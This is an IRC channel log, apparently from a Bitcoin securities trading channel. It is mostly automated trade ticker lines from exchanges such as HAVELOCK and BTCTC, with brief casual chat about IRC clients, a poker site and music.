[SDSTM] 1 @ 0.01084999 BTC [+] Jul 25 01:52:18 [HAVELOCK] [SDSTM] 1 @ 0.01085 BTC [+] Jul 25 01:52:55 [HAVELOCK] [SMG] 14 @ 0.00027 = 0.0038 BTC [+] Jul 25 01:53:02 [BTCTC] [KENILWORTH] 10 @ 0.0018 = 0.018 BTC [-] Jul 25 01:53:33 [BTCTC] [BITVPS] 444 @ 0.00196 = 0.8702 BTC [-] Jul 25 01:53:35 [BTCTC] [BITVPS] 1 @ 0.00193 BTC [-] Jul 25 01:53:38 [BTCTC] [BITVPS] 1 @ 0.0019 BTC [-] Jul 25 01:53:39 [HAVELOCK] [HIM] 1 @ 0.24 BTC [-] Jul 25 01:53:42 [BTCTC] [BITVPS] 121 @ 0.001811 = 0.2191 BTC [-] Jul 25 01:53:44 [BTCTC] [BITVPS] 2 @ 0.001811 = 0.0036 BTC [-] Jul 25 01:53:45 [BTCTC] [BITVPS] 10 @ 0.001801 = 0.018 BTC [-] Jul 25 01:53:47 [BTCTC] [BITVPS] 1054 @ 0.0018 = 1.8972 BTC [-] Jul 25 01:53:48 [BTCTC] [BITVPS] 150 @ 0.0018 = 0.27 BTC [-] Jul 25 01:53:50 [BTCTC] [BITVPS] 236 @ 0.0018 = 0.4248 BTC [-] Jul 25 01:53:51 [BTCTC] [BITVPS] 1 @ 0.001754 BTC [-] Jul 25 01:53:52 [BTCTC] [BITVPS] 10 @ 0.001743 = 0.0174 BTC [-] Jul 25 01:53:53 [HAVELOCK] [SDSTM] 1 @ 0.01085 BTC [+] Jul 25 01:53:55 [BTCTC] [BITVPS] 1000 @ 0.0017 = 1.7 BTC [-] Jul 25 01:53:57 [BTCTC] [BITVPS] 10 @ 0.001661 = 0.0166 BTC [-] Jul 25 01:53:58 [BTCTC] [BITVPS] 100 @ 0.001659 = 0.1659 BTC [-] Jul 25 01:54:09 [BTCTC] [BITVPS] 2345 @ 0.00165 = 3.8693 BTC [-] Jul 25 01:54:16 [BTCTC] [TAT.ASICMINER] 20 @ 0.044 = 0.88 BTC [-] Jul 25 01:54:35 [HAVELOCK] [AM100] 3 @ 0.0426 = 0.1278 BTC [-] Jul 25 01:54:49 thestringpuller: is it playable? Jul 25 01:55:19 whats the command to ignore someone? Jul 25 01:55:26 [HAVELOCK] [AM100] 100 @ 0.0425502 = 4.255 BTC [-] Jul 25 01:55:35 [HAVELOCK] [AM100] 100 @ 0.0425501 = 4.255 BTC [-] Jul 25 01:55:55 Depends on your client. Mostly /ignore name Jul 25 01:56:01 [HAVELOCK] [AM100] 22 @ 0.0426 = 0.9372 BTC [+] Jul 25 01:56:05 [HAVELOCK] [AM100] 2 @ 0.0417 = 0.0834 BTC [-] Jul 25 01:56:08 [HAVELOCK] [AM100] 5 @ 0.0416 = 0.208 BTC [-] Jul 25 01:56:10 [HAVELOCK] [AM100] 448 @ 0.04125 = 18.48 BTC [-] Jul 25 01:56:23 I could get into that game Jul 25 01:56:44 [HAVELOCK] [AM100] 52 @ 0.04125 = 2.145 BTC [-] Jul 25 01:56:47 i'm using webchat Jul 25 01:56:49 [HAVELOCK] [AM100] 500 @ 0.0412 = 20.6 BTC [-] Jul 25 01:57:06 Not sure, but try it. Jul 25 01:57:11 [HAVELOCK] [AM1] 3 @ 4.25 = 12.75 BTC [-] Jul 25 01:57:20 [BTCTC] [TAT.ASICMINER] 6 @ 0.04399 = 0.2639 BTC [-] Jul 25 01:57:32 no, :/ /ignore didn't work Jul 25 01:57:46 doesn't work on web client Jul 25 01:57:55 you shouldn't be using the web client anyway Jul 25 01:57:57 [BTCTC] [TAT.ASICMINER] 7 @ 0.0435 = 0.3045 BTC [-] Jul 25 01:57:58 [BTCTC] [TAT.ASICMINER] 15 @ 0.0435 = 0.6525 BTC [-] Jul 25 01:57:59 Well there it is Jul 25 01:58:10 Get xchat Jul 25 01:58:20 [BTCTC] [AMC-PT] 2 @ 0.003437 = 0.0069 BTC [-] Jul 25 01:58:22 [BTCTC] [TAT.ASICMINER] 27 @ 0.0435 = 1.1745 BTC [-] Jul 25 01:58:39 I guess there is no ignore option on webchat: http://superuser.com/questions/7111/there-is-any-irc-command-to-ignore-a-person Jul 25 01:58:39 [BTCTC] [TAT.ASICMINER] 8 @ 0.04346 = 0.3477 BTC [-] Jul 25 01:58:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.04201 = 0.126 BTC [-] Jul 25 01:58:43 [BTCTC] [TAT.ASICMINER] 6 @ 0.042 = 0.252 BTC [-] Jul 25 01:58:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.042 BTC [-] Jul 25 01:58:52 [BTCTC] [TAT.ASICMINER] 31 @ 0.04162 = 1.2902 BTC [-] Jul 25 01:58:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.04398 = 0.088 BTC [+] Jul 25 01:58:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.04161 = 0.0832 BTC [-] Jul 25 01:58:59 [BTCTC] [TAT.ASICMINER] 60 @ 0.041602 = 2.4961 BTC [-] Jul 25 01:59:01 [BTCTC] [TAT.ASICMINER] 13 @ 0.04131 = 0.537 BTC [-] Jul 25 01:59:03 [BTCTC] [TAT.ASICMINER] 25 @ 0.0413 = 1.0325 BTC [-] Jul 25 01:59:05 [BTCTC] [TAT.ASICMINER] 7 @ 0.0413 = 0.2891 BTC [-] Jul 25 01:59:07 [BTCTC] [TAT.ASICMINER] 20 @ 0.04125 = 0.825 BTC [-] Jul 25 01:59:41 TATanking Jul 25 01:59:52 Lol Jul 25 02:01:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.042 = 0.168 BTC [+] Jul 25 02:01:56 Why Jul 25 02:02:03 Who Jul 25 02:02:09 Sorry meant who lol Jul 25 02:02:24 [BTCTC] [B.YABMC] 11 @ 0.00299 = 0.0329 BTC [-] Jul 25 02:02:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0421 BTC [+] Jul 25 02:02:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.042 = 0.42 BTC [-] Jul 25 02:02:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.04398 BTC [+] Jul 25 02:03:00 [HAVELOCK] [HIM] 1 @ 0.2465 BTC [+] Jul 25 02:04:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.04397 = 0.2199 BTC [-] Jul 25 02:05:29 [BTCTC] [TAT.ASICMINER] 7 @ 0.04397 = 0.3078 BTC [-] Jul 25 02:05:38 Ahhhh Ok Jul 25 02:06:27 thestringpuller: bitfantasy Jul 25 02:06:35 signup link goes nowhere Jul 25 02:06:44 [HAVELOCK] [HIM] 12 @ 0.2466 = 2.9592 BTC [+] Jul 25 02:06:51 [BTCTC] [ASICMINER-PT] 1 @ 4.647 BTC [+] Jul 25 02:08:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.04396 = 0.1319 BTC [-] Jul 25 02:08:19 [HAVELOCK] [AM100] 5 @ 0.0428 = 0.214 BTC [+] Jul 25 02:08:40 [HAVELOCK] [AM100] 2 @ 0.0429 = 0.0858 BTC [+] Jul 25 02:08:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.04396 = 0.1319 BTC [-] Jul 25 02:08:49 [BTCTC] [TAT.ASICMINER] 13 @ 0.04397 = 0.5716 BTC [+] Jul 25 02:08:51 [BTCTC] [TAT.ASICMINER] 50 @ 0.04397 = 2.1985 BTC [+] Jul 25 02:10:14 [BTCTC] [TAT.MINIGAME] 33 @ 0.00027 = 0.0089 BTC [+] Jul 25 02:10:38 [BTCTC] [BASIC-MINING] 1 @ 0.4605 BTC [-] Jul 25 02:10:39 [BTCTC] [BASIC-MINING] 1 @ 0.46 BTC [-] Jul 25 02:10:41 [BTCTC] [BASIC-MINING] 8 @ 0.45 = 3.6 BTC [-] Jul 25 02:11:05 [HAVELOCK] [AM100] 95 @ 0.0434999 = 4.1325 BTC [+] Jul 25 02:11:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.04399 BTC [+] Jul 25 02:12:14 [HAVELOCK] [AM100] 46 @ 0.0434999 = 2.001 BTC [+] Jul 25 02:12:21 [HAVELOCK] [AM100] 200 @ 0.0435 = 8.7 BTC [+] Jul 25 02:13:02 [BTCTC] [AMC-PT] 30 @ 0.003438 = 0.1031 BTC [+] Jul 25 02:13:13 [BTCTC] [ASICMINER-PT] 1 @ 4.599 BTC [-] Jul 25 02:13:29 [BTCTC] [BASIC-MINING] 5 @ 0.432 = 2.16 BTC [-] Jul 25 02:13:31 [BTCTC] [BASIC-MINING] 3 @ 0.432 = 1.296 BTC [-] Jul 25 02:13:33 [BTCTC] [BASIC-MINING] 2 @ 0.4302 = 0.8604 BTC [-] Jul 25 02:14:08 [BTCTC] [ASICMINER-PT] 1 @ 4.599 BTC [-] Jul 25 02:14:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.044 = 0.44 BTC [+] Jul 25 02:14:33 [BTCTC] [TAT.MINIGAME] 300 @ 0.00027 = 0.081 BTC [+] Jul 25 02:14:34 [BTCTC] [AMC-PT] 87 @ 0.003448 = 0.3 BTC [+] Jul 25 02:14:36 [BTCTC] [AMC-PT] 57 @ 0.003449 = 0.1966 BTC [+] Jul 25 02:15:56 [BTCTC] [AMC-PT] 189 @ 0.003449 = 0.6519 BTC [+] Jul 25 02:16:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.044 = 0.176 BTC [+] Jul 25 02:17:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.044 = 0.176 BTC [+] Jul 25 02:17:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.044 = 0.088 BTC [+] Jul 25 02:17:35 so satoshi poker is ukyo? Jul 25 02:18:57 [HAVELOCK] [AM100] 141 @ 0.0435999 = 6.1476 BTC [+] Jul 25 02:19:10 nah Jul 25 02:19:23 run by others Jul 25 02:19:32 i assume he's underwriting or owns some Jul 25 02:19:36 [BTCTC] [TAT.MINIGAME] 5 @ 0.00027 = 0.0014 BTC [+] Jul 25 02:19:48 [BTCTC] [TAT.ASICMINER] 4 @ 0.04499 = 0.18 BTC [+] Jul 25 02:19:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.04499 = 0.09 BTC [+] Jul 25 02:21:13 [BTCTC] [TAT.ASICMINER] 6 @ 0.04499 = 0.2699 BTC [+] Jul 25 02:21:39 [HAVELOCK] [SMG] 76 @ 0.00027 = 0.0205 BTC [+] Jul 25 02:22:04 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [-] Jul 25 02:22:22 [HAVELOCK] [AM100] 141 @ 0.0435999 = 6.1476 BTC [+] Jul 25 02:22:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.04499 = 0.09 BTC [+] Jul 25 02:22:27 [BTCTC] [TAT.ASICMINER] 48 @ 0.04499 = 2.1595 BTC [+] Jul 25 02:23:33 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [+] Jul 25 02:24:19 [HAVELOCK] [AM100] 7 @ 0.0435998 = 0.3052 BTC [-] Jul 25 02:25:04 [HAVELOCK] [SDSTM] 3 @ 0.0108 = 0.0324 BTC [-] Jul 25 02:25:17 Well time for beer and burgers Jul 25 02:25:21 [BTCTC] [ASICMINER-PT] 1 @ 4.599 BTC [-] Jul 25 02:25:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.04498 = 0.09 BTC [-] Jul 25 02:25:35 [HAVELOCK] [AM100] 2 @ 0.0434999 = 0.087 BTC [-] Jul 25 02:25:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.04485 = 0.2243 BTC [-] Jul 25 02:25:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.04498 = 0.2249 BTC [+] Jul 25 02:26:02 [BTCTC] [AMC-PT] 600 @ 0.00345 = 2.07 BTC [+] Jul 25 02:26:03 [BTCTC] [BASIC-MINING] 2 @ 0.4303 = 0.8606 BTC [+] Jul 25 02:26:05 [BTCTC] [BASIC-MINING] 3 @ 0.4302 = 1.2906 BTC [-] Jul 25 02:26:30 [HAVELOCK] [AM100] 134 @ 0.0434999 = 5.829 BTC [-] Jul 25 02:26:38 [HAVELOCK] [AM100] 2 @ 0.0435 = 0.087 BTC [+] Jul 25 02:28:34 [HAVELOCK] [AM100] 15 @ 0.04349988 = 0.6525 BTC [-] Jul 25 02:29:40 [HAVELOCK] [AM100] 24 @ 0.04359989 = 1.0464 BTC [+] Jul 25 02:29:53 [HAVELOCK] [AM100] 5 @ 0.04359999 = 0.218 BTC [+] Jul 25 02:30:02 [BTCTC] [ASICMINER-PT] 1 @ 4.599 BTC [-] Jul 25 02:30:07 [HAVELOCK] [AM100] 31 @ 0.04240011 = 1.3144 BTC [-] Jul 25 02:30:43 [HAVELOCK] [AM100] 202 @ 0.04369 = 8.8254 BTC [+] Jul 25 02:32:09 [HAVELOCK] [HIM] 10 @ 0.221 = 2.21 BTC [-] Jul 25 02:33:13 [HAVELOCK] [AM100] 5 @ 0.0437 = 0.2185 BTC [+] Jul 25 02:33:25 [HAVELOCK] [AM100] 10 @ 0.0438487 = 0.4385 BTC [+] Jul 25 02:33:35 [HAVELOCK] [AM100] 55 @ 0.04384888 = 2.4117 BTC [+] Jul 25 02:33:42 [HAVELOCK] [AM100] 57 @ 0.04384889 = 2.4994 BTC [+] Jul 25 02:33:51 [HAVELOCK] [AM100] 98 @ 0.04389976 = 4.3022 BTC [+] Jul 25 02:34:03 [HAVELOCK] [AM100] 5 @ 0.0439 = 0.2195 BTC [+] Jul 25 02:34:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.04489 = 0.0898 BTC [-] Jul 25 02:34:49 only for a moment Jul 25 02:34:50 [HAVELOCK] [AM100] 100 @ 0.044 = 4.4 BTC [+] Jul 25 02:34:52 [HAVELOCK] [AM100] 12 @ 0.044 = 0.528 BTC [+] Jul 25 02:34:54 got a recording session Jul 25 02:34:54 [HAVELOCK] [AM100] 340 @ 0.044 = 14.96 BTC [+] Jul 25 02:35:15 a wat Jul 25 02:35:52 putting finishing touches on this rap project Jul 25 02:36:03 [BTCTC] [TAT.ASICMINER] 5 @ 0.0449 = 0.2245 BTC [+] Jul 25 02:36:05 [BTCTC] [TAT.ASICMINER] 17 @ 0.0449 = 0.7633 BTC [+] Jul 25 02:36:19 mixing session, i should say Jul 25 02:37:28 [HAVELOCK] [AM100] 509 @ 0.044 = 22.396 BTC [+] Jul 25 02:38:52 [BTCTC] [BASIC-MINING] 1 @ 0.49 BTC [+] Jul 25 02:38:54 [BTCTC] [BASIC-MINING] 3 @ 0.49 = 1.47 BTC [+] Jul 25 02:38:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.04488 = 0.1795 BTC [-] Jul 25 02:39:12 word Jul 25 02:40:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.04487 BTC [-] Jul 25 02:40:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.04488 BTC [+] Jul 25 02:41:00 [BTCTC] [TAT.ASICMINER] 13 @ 0.04489 = 0.5836 BTC [+] Jul 25 02:41:02 [BTCTC] [TAT.ASICMINER] 12 @ 0.04499 = 0.5399 BTC [+] Jul 25 02:45:31 [BTCTC] [TAT.ASICMINER] 12 @ 0.04499 = 0.5399 BTC [+] Jul 25 02:45:47 [HAVELOCK] [HIM] 5 @ 0.221 = 1.105 BTC [-] Jul 25 02:46:29 [HAVELOCK] [HIM] 9 @ 0.21000001 = 1.89 BTC [-] Jul 25 02:46:32 [HAVELOCK] [HIM] 7 @ 0.21 = 1.47 BTC [-] Jul 25 02:46:41 [HAVELOCK] [AM100] 5 @ 0.04385 = 0.2193 BTC [-] Jul 25 02:46:58 [HAVELOCK] [AM100] 3 @ 0.04300001 = 0.129 BTC [-] Jul 25 02:47:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.04499 = 0.135 BTC [+] Jul 25 02:47:18 [BTCTC] [TAT.ASICMINER] 12 @ 0.04499 = 0.5399 BTC [+] Jul 25 02:47:21 [HAVELOCK] [HIM] 10 @ 0.221 = 2.21 BTC [+] Jul 25 02:47:22 [HAVELOCK] [HIM] 3 @ 0.24749999 = 0.7425 BTC [+] Jul 25 02:47:25 [BTCTC] [TAT.ASICMINER] 12 @ 0.044 = 0.528 BTC [-] Jul 25 02:47:26 [HAVELOCK] [HIM] 1 @ 0.2475 BTC [+] Jul 25 02:47:28 [HAVELOCK] [HIM] 3 @ 0.2479 = 0.7437 BTC [+] Jul 25 02:47:30 [HAVELOCK] [HIM] 10 @ 0.248 = 2.48 BTC [+] Jul 25 02:47:32 [HAVELOCK] [HIM] 17 @ 0.249 = 4.233 BTC [+] Jul 25 02:47:34 [HAVELOCK] [HIM] 1 @ 0.25 BTC [+] Jul 25 02:47:36 [HAVELOCK] [HIM] 4 @ 0.25 = 1 BTC [+] Jul 25 02:50:22 [HAVELOCK] [HIM] 12 @ 0.2551 = 3.0612 BTC [+] Jul 25 02:50:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.04499 = 0.4499 BTC [+] Jul 25 02:50:58 [HAVELOCK] [AM100] 5 @ 0.0427 = 0.2135 BTC [-] Jul 25 02:50:59 [HAVELOCK] [AM100] 146 @ 0.0426011 = 6.2198 BTC [-] Jul 25 02:51:02 [HAVELOCK] [AM100] 24 @ 0.042601 = 1.0224 BTC [-] Jul 25 02:51:04 [HAVELOCK] [AM100] 1 @ 0.0426 BTC [-] Jul 25 02:51:14 [BTCTC] [AMC-PT] 8 @ 0.003449 = 0.0276 BTC [-] Jul 25 02:51:27 [HAVELOCK] [HIM] 30 @ 0.25 = 7.5 BTC [-] Jul 25 02:53:14 [HAVELOCK] [AM100] 147 @ 0.0424501 = 6.2402 BTC [-] Jul 25 02:53:17 [HAVELOCK] [AM100] 500 @ 0.04245 = 21.225 BTC [-] Jul 25 02:53:28 [BTCTC] [COGNITIVE] 2 @ 0.57 = 1.14 BTC [-] Jul 25 02:53:47 [HAVELOCK] [AM100] 100 @ 0.04245 = 4.245 BTC [-] Jul 25 02:54:05 [HAVELOCK] [AM100] 100 @ 0.04245 = 4.245 BTC [-] Jul 25 02:54:21 [HAVELOCK] [HIM] 9 @ 0.25 = 2.25 BTC [-] Jul 25 02:54:28 [HAVELOCK] [AM100] 150 @ 0.0424002 = 6.36 BTC [-] Jul 25 02:54:30 [BTCTC] [TAT.ASICMINER] 12 @ 0.04499 = 0.5399 BTC [+] Jul 25 02:55:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.044 = 0.088 BTC [-] Jul 25 02:55:37 [HAVELOCK] [AM100] 50 @ 0.04245 = 2.1225 BTC [+] Jul 25 02:56:07 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [+] Jul 25 02:56:08 [BTCTC] [AMC-PT] 14 @ 0.003449 = 0.0483 BTC [-] Jul 25 02:56:11 [HAVELOCK] [AM100] 5 @ 0.04245 = 0.2123 BTC [+] Jul 25 02:56:14 [BTCTC] [ASICMINER-PT] 4 @ 4.6 = 18.4 BTC [+] Jul 25 02:56:37 [BTCTC] [DMS.PURCHASE] 19 @ 0.03391 = 0.6443 BTC [+] Jul 25 02:56:43 [HAVELOCK] [AM100] 52 @ 0.04245 = 2.2074 BTC [+] Jul 25 02:57:56 [BTCTC] [AMC-PT] 20 @ 0.003449 = 0.069 BTC [-] Jul 25 02:59:15 [BTCTC] [TAT.MINIGAME] 3 @ 0.00027 = 0.0008 BTC [+] Jul 25 03:00:53 [BTCTC] [ASICMINER-PT] 1 @ 4.649 BTC [+] Jul 25 03:00:54 [BTCTC] [RSM] 1 @ 0.0145 BTC [-] Jul 25 03:00:54 [BTCTC] [ASICMINER-PT] 10 @ 4.65 = 46.5 BTC [+] Jul 25 03:02:24 [BTCTC] [TAT.MINIGAME] 54 @ 0.00027 = 0.0146 BTC [+] Jul 25 03:02:56 [BTCTC] [TAT.ASICMINER] 12 @ 0.04499 = 0.5399 BTC [+] Jul 25 03:03:01 [BTCTC] [TAT.ASICMINER] 33 @ 0.045 = 1.485 BTC [+] Jul 25 03:05:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.04499 = 0.225 BTC [-] Jul 25 03:10:39 [BTCTC] [AMC-PT] 200 @ 0.00345 = 0.69 BTC [+] Jul 25 03:10:41 [BTCTC] [AMC-PT] 50 @ 0.00345 = 0.1725 BTC [+] Jul 25 03:11:17 [BTCTC] [AMC-PT] 47 @ 0.003497 = 0.1644 BTC [+] Jul 25 03:11:19 [BTCTC] [AMC-PT] 25 @ 0.003498 = 0.0875 BTC [+] Jul 25 03:11:21 [BTCTC] [AMC-PT] 50 @ 0.0035 = 0.175 BTC [+] Jul 25 03:11:23 [BTCTC] [AMC-PT] 500 @ 0.0035 = 1.75 BTC [+] Jul 25 03:12:10 [HAVELOCK] [SDSTM] 3 @ 0.01084 = 0.0325 BTC [+] Jul 25 03:15:13 [MPEX] [S.MPOE] 13390 @ 0.00079859 = 10.6931 BTC [-] Jul 25 03:15:13 [HAVELOCK] [KCIM] 1 @ 0.831 BTC [-] Jul 25 03:15:50 [BTCTC] [AMC-PT] 3 @ 0.003596 = 0.0108 BTC [+] Jul 25 03:15:53 [BTCTC] [AMC-PT] 25 @ 0.003597 = 0.0899 BTC [+] Jul 25 03:15:53 [BTCTC] [AMC-PT] 122 @ 0.003637 = 0.4437 BTC [+] Jul 25 03:15:55 [BTCTC] [AMC-PT] 45 @ 0.003638 = 0.1637 BTC [+] Jul 25 03:15:55 [BTCTC] [AMC-PT] 200 @ 0.00364 = 0.728 BTC [+] Jul 25 03:15:57 [BTCTC] [AMC-PT] 2202 @ 0.003644 = 8.0241 BTC [+] Jul 25 03:15:58 [BTCTC] [AMC-PT] 5947 @ 0.003645 = 21.6768 BTC [+] Jul 25 03:16:00 [BTCTC] [AMC-PT] 500 @ 0.003647 = 1.8235 BTC [+] Jul 25 03:16:01 [BTCTC] [AMC-PT] 1000 @ 0.003649 = 3.649 BTC [+] Jul 25 03:16:02 [BTCTC] [AMC-PT] 250 @ 0.003683 = 0.9208 BTC [+] Jul 25 03:16:03 [BTCTC] [AMC-PT] 109 @ 0.003684 = 0.4016 BTC [+] Jul 25 03:16:04 [BTCTC] [AMC-PT] 1661 @ 0.003685 = 6.1208 BTC [+] Jul 25 03:16:06 [BTCTC] [AMC-PT] 350 @ 0.003686 = 1.2901 BTC [+] Jul 25 03:16:09 [HAVELOCK] [HIM] 2 @ 0.25 = 0.5 BTC [-] Jul 25 03:16:44 [HAVELOCK] [HIM] 2 @ 0.25 = 0.5 BTC [-] Jul 25 03:17:18 [HAVELOCK] [HIM] 8 @ 0.25 = 2 BTC [-] Jul 25 03:18:32 [BTCTC] [AMC-PT] 250 @ 0.0037 = 0.925 BTC [+] Jul 25 03:18:34 [BTCTC] [AMC-PT] 140 @ 0.003701 = 0.5181 BTC [+] Jul 25 03:19:07 [BTCTC] [AMC-PT] 1 @ 0.003699 BTC [-] Jul 25 03:19:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.04499 = 0.135 BTC [-] Jul 25 03:20:00 [BTCTC] [DMS.PURCHASE] 1 @ 0.03391 BTC [+] Jul 25 03:21:26 [BTCTC] [AMC-PT] 2 @ 0.003699 = 0.0074 BTC [-] Jul 25 03:21:32 [HAVELOCK] [HIM] 1 @ 0.26 BTC [+] Jul 25 03:22:06 [BTCTC] [B.YABMC] 2 @ 0.00299 = 0.006 BTC [-] Jul 25 03:23:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.04499 BTC [-] Jul 25 03:23:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.04499 BTC [-] Jul 25 03:23:50 [BTCTC] [S.MPOE-PT] 1 @ 0.00085 BTC [-] Jul 25 03:23:58 [BTCTC] [AMC-PT] 17 @ 0.003699 = 0.0629 BTC [-] Jul 25 03:24:38 [BTCTC] [S.BBET-PT] 1 @ 0.001921 BTC [-] Jul 25 03:25:07 [BTCTC] [DMS.MINING] 1 @ 0.01414 BTC [+] Jul 25 03:25:30 [BTCTC] [DMS.SELLING] 7 @ 0.0184 = 0.1288 BTC [-] Jul 25 03:25:32 [BTCTC] [DMS.SELLING] 3 @ 0.0183 = 0.0549 BTC [-] Jul 25 03:26:01 [BTCTC] [TAT.ASICMINER] 8 @ 0.04499 = 0.3599 BTC [-] Jul 25 03:26:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [+] Jul 25 03:26:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.045 = 0.18 BTC [+] Jul 25 03:26:32 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [-] Jul 25 03:30:24 [BTCTC] [TAT.ASICMINER] 7 @ 0.04499 = 0.3149 BTC [-] Jul 25 03:33:14 [BTCTC] [BASIC-MINING] 5 @ 0.495 = 2.475 BTC [+] Jul 25 03:33:16 [BTCTC] [BASIC-MINING] 3 @ 0.495 = 1.485 BTC [+] Jul 25 03:36:03 [BTCTC] [ASICMINER-PT] 1 @ 4.59 BTC [-] Jul 25 03:36:23 [BTCTC] [ASICMINER-PT] 1 @ 4.589 BTC [-] Jul 25 03:37:07 [MPEX] [S.MPOE] 5710 @ 0.00080002 = 4.5681 BTC [+] Jul 25 03:37:10 [MPEX] [S.MPOE] 4390 @ 0.00079942 = 3.5095 BTC [-] Jul 25 03:41:18 [BTCTC] [ASICMINER-PT] 1 @ 4.678 BTC [+] Jul 25 03:41:25 [HAVELOCK] [SDSTM] 3 @ 0.01084 = 0.0325 BTC [+] Jul 25 03:44:26 [HAVELOCK] [AM100] 2 @ 0.0427 = 0.0854 BTC [+] Jul 25 03:46:03 [HAVELOCK] [SMG] 2009 @ 0.00027 = 0.5424 BTC [+] Jul 25 03:47:39 [HAVELOCK] [AM100] 98 @ 0.0427 = 4.1846 BTC [+] Jul 25 03:48:11 [HAVELOCK] [SMG] 2 @ 0.000279 = 0.0006 BTC [+] Jul 25 03:48:30 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003099 = 0.031 BTC [-] Jul 25 03:48:32 [HAVELOCK] [SMG] 25 @ 0.000279 = 0.007 BTC [+] Jul 25 03:48:34 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0031 BTC [+] Jul 25 03:48:36 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.003217 = 1.6085 BTC [+] Jul 25 03:48:37 [BTCTC] [TAT.VIRTUALMINE] 80 @ 0.003221 = 0.2577 BTC [+] Jul 25 03:48:38 [BTCTC] [TAT.VIRTUALMINE] 53 @ 0.003227 = 0.171 BTC [+] Jul 25 03:48:39 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.003228 = 1.614 BTC [+] Jul 25 03:48:40 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00323 = 0.0129 BTC [+] Jul 25 03:48:42 [BTCTC] [TAT.VIRTUALMINE] 129 @ 0.00324 = 0.418 BTC [+] Jul 25 03:48:43 [BTCTC] [TAT.VIRTUALMINE] 600 @ 0.003241 = 1.9446 BTC [+] Jul 25 03:48:43 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.003244 = 1.622 BTC [+] Jul 25 03:48:44 [BTCTC] [TAT.VIRTUALMINE] 250 @ 0.00335 = 0.8375 BTC [+] Jul 25 03:48:45 [BTCTC] [TAT.VIRTUALMINE] 185 @ 0.0034 = 0.629 BTC [+] Jul 25 03:48:46 [BTCTC] [TAT.VIRTUALMINE] 2844 @ 0.0034 = 9.6696 BTC [+] Jul 25 03:49:21 [HAVELOCK] [AM100] 125 @ 0.0425101 = 5.3138 BTC [-] Jul 25 03:52:14 [BTCTC] [KENILWORTH] 3000 @ 0.0018 = 5.4 BTC [-] Jul 25 03:53:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.045 = 0.09 BTC [+] Jul 25 03:53:58 [BTCTC] [TAT.ASICMINER] 4 @ 0.045 = 0.18 BTC [+] Jul 25 03:54:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.045 = 0.09 BTC [+] Jul 25 03:54:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.04499 BTC [-] Jul 25 03:56:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.04499 = 0.225 BTC [-] Jul 25 03:56:15 [HAVELOCK] [SDSTM] 9 @ 0.01084 = 0.0976 BTC [+] Jul 25 03:57:25 [BTCTC] [BASIC-MINING] 1 @ 0.4402 BTC [-] Jul 25 03:57:27 [BTCTC] [BASIC-MINING] 10 @ 0.4401 = 4.401 BTC [-] Jul 25 03:57:29 [BTCTC] [BASIC-MINING] 1 @ 0.44 BTC [-] Jul 25 03:57:30 [BTCTC] [BASIC-MINING] 1 @ 0.44 BTC [-] Jul 25 03:57:32 [BTCTC] [BASIC-MINING] 1 @ 0.4302 BTC [-] Jul 25 03:57:34 [BTCTC] [BASIC-MINING] 2 @ 0.4301 = 0.8602 BTC [-] Jul 25 03:57:36 [BTCTC] [BASIC-MINING] 1 @ 0.421 BTC [-] Jul 25 03:57:38 [BTCTC] [BASIC-MINING] 4 @ 0.421 = 1.684 BTC [-] Jul 25 03:58:15 [BTCTC] [ASICMINER-PT] 1 @ 4.62 BTC [-] Jul 25 03:58:31 [BTCTC] [ASICMINER-PT] 2 @ 4.61 = 9.22 BTC [-] Jul 25 03:58:56 [BTCTC] [COGNITIVE] 1 @ 0.57 BTC [-] Jul 25 03:59:19 [BTCTC] [COGNITIVE] 1 @ 0.57 BTC [-] Jul 25 03:59:23 [BTCTC] [COGNITIVE] 2 @ 0.531 = 1.062 BTC [-] Jul 25 03:59:25 [BTCTC] [COGNITIVE] 4 @ 0.53 = 2.12 BTC [-] Jul 25 03:59:50 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [+] Jul 25 04:00:30 [BTCTC] [ASICMINER-PT] 4 @ 4.65 = 18.6 BTC [+] Jul 25 04:00:54 [BTCTC] [AMC-PT] 5 @ 0.0036 = 